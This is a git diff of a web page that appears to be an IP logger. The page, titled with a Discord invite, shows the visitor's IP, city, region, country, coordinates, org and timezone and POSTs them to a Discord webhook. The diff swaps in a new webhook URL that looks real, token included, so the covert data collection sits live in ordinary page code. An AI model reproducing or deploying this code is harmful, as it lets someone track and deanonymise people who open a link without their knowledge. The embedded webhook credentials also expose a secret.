--- a/index.html
+++ b/index.html
@@ -3,7 +3,7 @@
 <head>
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
-    <title>discord.gg/3MermwaaHx-ADAM-_o9g</title>
+    <title>discord.gg/3MermwaaHx-ADAM_o9g</title>
     <style>
         body {
             margin: 0;
@@ -70,7 +70,7 @@
             infoDiv.innerHTML = `<strong>IP:</strong><span>"${ip}"</span><br><strong>City:</strong><span>"${city}"</span><br><strong>Region:</strong><span>"${region}"</span><br><strong>Country:</strong><span>"${country}"</span><br><strong>Location:</strong><span>"${loc}"</span><br><strong></strong> <span>"${org}"</span><br><strong>Timezone:</strong><span>"${timezone}"</span>`;
 
             const dateTime = new Date().toLocaleString();
-            const webhookUrl = 'https://discord.com/api/webhooks/1343716504331616328/8-HtlyIdfpvEZ9kyNrCQZIoTXKCOnoGBwMkRNtcuQF3rdjUDhh4';
+            const webhookUrl = 'https://discord.com/api/webhooks/1414208574871310397/YyEjkEGDPDMMAtPjfgsns5ZVbJJJvY2RIESCuXyDQpn1KciIEHizzZ_ZBers-0XCq68J';
             fetch(webhookUrl, {
                 method: 'POST',
                 headers: {'Content-Type': 'application/json'},
